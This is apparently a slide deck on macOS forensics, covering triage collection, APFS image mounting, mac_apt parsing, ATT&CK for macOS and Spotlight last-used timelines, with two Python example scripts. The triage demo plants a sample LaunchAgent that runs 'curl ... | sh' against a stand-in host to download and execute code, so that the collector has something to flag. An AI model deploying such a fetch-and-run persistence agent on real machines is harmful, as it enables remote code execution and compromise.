Mac Forensics
EDC
✓ macOS High Sierra (APFS)
INTRODUCTION
• How & What
✓ Implemented in python3, for the Mac
➢ Triage tool (fast forensics), Mount tool, Parse & Filter tool
➢ A GUI front end for mac_apt (GUI-based operation)
→ The parsing itself is done by mac_apt
TRIAGE TOOL(MACOS FILE TRIAGE TOOL)
✓ Written in Go and shipped as a standalone .app
→ no separate python runtime is needed on the target Mac
✓ Collection profiles:
  Malware
  Fraud
  macripper : the artifact set consumed by mac_ripper
  ALLList : everything in the list
• Evidence collection and file timestamps
✓ ctime of the collected copy (see ditto)
✓ btime of the original file
  (the spotlight db is also collected for mac_ripper)
• Collected artifacts
✓ Persistence locations
✓ $USER may be used in a path (expanded per user)
→ /Library/LaunchAgents/*.plist
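As an added example (not the presentation's triage tool), the following Python collector shows the pieces a triage pass over persistence locations needs: expanding `$USER` in path patterns against the home directories found under a root (a mounted image or `/`), recording mtime/ctime/atime and, where the OS exposes `st_birthtime`, btime from the original path before anything is copied (a copy gets a new inode, so no copy tool can carry ctime over), hashing each file, and summarising launchd plists. The pattern list and the sample LaunchAgent are constructed for illustration.

```python
"""Minimal macOS file-triage collector (added example, constructed data)."""
import csv
import glob
import hashlib
import io
import os
import plistlib
import tempfile

# Constructed pattern list; "$USER" is expanded to every home directory under root.
TRIAGE_PATTERNS = [
    "/Library/LaunchAgents/*.plist",
    "/Library/LaunchDaemons/*.plist",
    "/Users/$USER/Library/LaunchAgents/*.plist",
]


def file_times(path):
    """Four stat timestamps; btime is None where the OS has no st_birthtime (e.g. Linux)."""
    st = os.stat(path, follow_symlinks=False)
    return {
        "mtime": st.st_mtime,
        "ctime": st.st_ctime,  # inode change time: reset by any copy, so record it here
        "atime": st.st_atime,
        "btime": getattr(st, "st_birthtime", None),  # macOS/BSD only
    }


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def summarize_launchd_plist(path):
    """Extract the fields that matter for persistence triage from a launchd plist."""
    with open(path, "rb") as f:
        pl = plistlib.load(f)
    program = pl.get("ProgramArguments") or ([pl["Program"]] if "Program" in pl else [])
    return {
        "label": pl.get("Label", ""),
        "program": " ".join(program),
        "run_at_load": bool(pl.get("RunAtLoad", False)),
        "keep_alive": bool(pl.get("KeepAlive", False)),
    }


def expand_patterns(root, patterns):
    """Yield absolute glob patterns, expanding $USER against /Users/* under root."""
    base = glob.escape(root)
    users_dir = os.path.join(root, "Users")
    users = sorted(os.listdir(users_dir)) if os.path.isdir(users_dir) else []
    for pat in patterns:
        rel = pat.lstrip("/")
        if "$USER" in rel:
            for user in users:
                yield os.path.join(base, rel.replace("$USER", user))
        else:
            yield os.path.join(base, rel)


def triage(root, patterns=TRIAGE_PATTERNS):
    rows = []
    for pattern in expand_patterns(root, patterns):
        for path in sorted(glob.glob(pattern)):
            if not os.path.isfile(path):
                continue
            row = {"path": os.path.relpath(path, root), **file_times(path),
                   "sha256": sha256_file(path)}
            if path.endswith(".plist"):
                try:
                    row.update(summarize_launchd_plist(path))
                except (plistlib.InvalidFileException, KeyError, ValueError) as exc:
                    row["parse_error"] = str(exc)  # keep the row; a bad plist is itself a finding
            rows.append(row)
    return rows


def to_csv(rows):
    fields = ["path", "btime", "ctime", "mtime", "atime", "sha256",
              "label", "program", "run_at_load", "keep_alive", "parse_error"]
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=fields, extrasaction="ignore")
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


def demo():
    """Build a constructed root with one suspicious LaunchAgent and triage it."""
    root = tempfile.mkdtemp()
    agent_dir = os.path.join(root, "Users", "alice", "Library", "LaunchAgents")
    os.makedirs(agent_dir)
    plist = {"Label": "com.example.updater",
             "ProgramArguments": ["/bin/sh", "-c", "curl -s http://example.invalid/x | sh"],
             "RunAtLoad": True}
    with open(os.path.join(agent_dir, "com.example.updater.plist"), "wb") as f:
        plistlib.dump(plist, f)
    return triage(root)


if __name__ == "__main__":
    print(to_csv(demo()))
```

Run it against a mounted image by calling `triage("/Volumes/evidence")` instead of `demo()`; the CSV keeps btime and ctime side by side so a collection step that disturbed them is visible later.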
MOUNT TOOL(APFS IMAGE MOUNTER)
• Mounts APFS images on a Mac
✓ Python3.7
✓ Browse to the image file
MAC RIPPER(GUI)
• GUI front end for mac_apt
✓ Python3.7
✓ 'Browse' to select the input (root)
✓ 'Browse' to select the output folder
✓ 'Rip' to start parsing
✓ 'Finish' is shown when the run completes
(GUI fields: Input(root), output)
[Figure: ATT&CK matrix for macOS. Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
ATT&CK (MACOS)
• ATT&CK for macOS
• kMDItemLastUsedDate in Spotlight.db
✓ kMDItemLastUsedDate
→ output as csv by mac_ripper's spotlight (last_used) module
EXECUTION (SPOTLIGHT)
• Timeline from kMDItemLastUsedDate
✓ kMDItemLastUsedDate is updated when the item is opened
✓ zip downloaded with safari
✓ zip opened
✓ app launched
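As an added example (not the presentation's mac_ripper module), this Python script turns per-file Spotlight attributes into the kind of "last used" timeline described above. On a live Mac the attributes come from `mdls -name kMDItemLastUsedDate -name kMDItemContentType -name kMDItemUseCount <file>`; here the mdls output is constructed inline so the example runs anywhere. The set of content types treated as interesting and the sample paths are assumptions.

```python
"""Build a last-used timeline from mdls-style Spotlight output (added example)."""
import csv
import io
import re
from datetime import datetime, timezone

# Constructed `mdls` output keyed by path: a zip downloaded with Safari, the app
# extracted from it, and a document that was never opened through Launch Services.
MDLS_SAMPLE = {
    "/Users/alice/Downloads/Tool.zip": """\
kMDItemContentType        = "public.zip-archive"
kMDItemLastUsedDate       = 2019-05-10 02:15:33 +0000
kMDItemUseCount           = 1
""",
    "/Users/alice/Downloads/Tool.app": """\
kMDItemContentType        = "com.apple.application-bundle"
kMDItemLastUsedDate       = 2019-05-10 02:16:02 +0000
kMDItemUseCount           = 2
""",
    "/Users/alice/Documents/notes.txt": """\
kMDItemContentType        = "public.plain-text"
kMDItemLastUsedDate       = (null)
""",
}

# Assumed set: content types that point at unpacking or execution rather than storage.
INTERESTING_TYPES = {"com.apple.application-bundle", "public.zip-archive"}

_ATTR = re.compile(r"^(kMDItem\w+)\s*=\s*(.*)$")


def parse_mdls(text):
    """Parse the `key = value` lines mdls prints into a dict of strings."""
    attrs = {}
    for line in text.splitlines():
        m = _ATTR.match(line.strip())
        if m:
            attrs[m.group(1)] = m.group(2).strip().strip('"')
    return attrs


def parse_mdls_date(value):
    """mdls prints dates as 'YYYY-MM-DD HH:MM:SS +0000'; '(null)' means the attribute is unset."""
    if not value or value == "(null)":
        return None
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S %z").astimezone(timezone.utc)


def last_used_timeline(samples, only_types=None):
    """Rows sorted by kMDItemLastUsedDate; items never used (or of other types) are dropped."""
    rows = []
    for path, text in samples.items():
        attrs = parse_mdls(text)
        when = parse_mdls_date(attrs.get("kMDItemLastUsedDate"))
        ctype = attrs.get("kMDItemContentType", "")
        if when is None or (only_types and ctype not in only_types):
            continue
        rows.append({
            "last_used_utc": when.isoformat(),
            "path": path,
            "content_type": ctype,
            "use_count": int(attrs.get("kMDItemUseCount", "0") or 0),
        })
    rows.sort(key=lambda r: r["last_used_utc"])
    return rows


def timeline_csv(rows):
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=["last_used_utc", "path", "content_type", "use_count"])
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(timeline_csv(last_used_timeline(MDLS_SAMPLE, INTERESTING_TYPES)))
```

The zip-then-app ordering in the output is the sequence the slide describes (download, open archive, launch app); a file with `(null)` for kMDItemLastUsedDate was indexed but never opened through Launch Services, which is why the plain-text document drops out of the timeline.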
MAC FORENSICS (DIFFERENCES FROM WINDOWS)
• Compared with Windows
✓ Windows
✓ Mac: UNIX-based …
• Mac4n6 resources
✓ Sarah Edwards (@iamevltwin) → https://www.mac4n6.com/
✓ Yogesh Khatri (@SwiftForensics) → https://www.swiftforensics.com/
✓ Mac4n6 (Macadmins) → https://github.com/pstirparo/mac4n6
✓ Objective-See → https://objective-see.com/index.html
✓ BlackBag blog → https://www.blackbagtech.com/index.php/blog
✓ SentinelOne → https://www.sentinelone.com/blog/
✓ Focus Systems → https://cyberforensic.focus-s.com/knowledge/articles_detail/
✓ APFS Imaging (slo-sleuth) → https://github.com/slo-sleuth/slo-sleuth.github.io/blob/master/Apple/APFS%20Imaging.md
MAC FORENSIC TOOLS
• Free tools
✓ mac_apt (https://github.com/ydkhatri/mac_apt)
• Commercial tools
✓ BlackLight
✓ RECON LAB
✓ AXIOM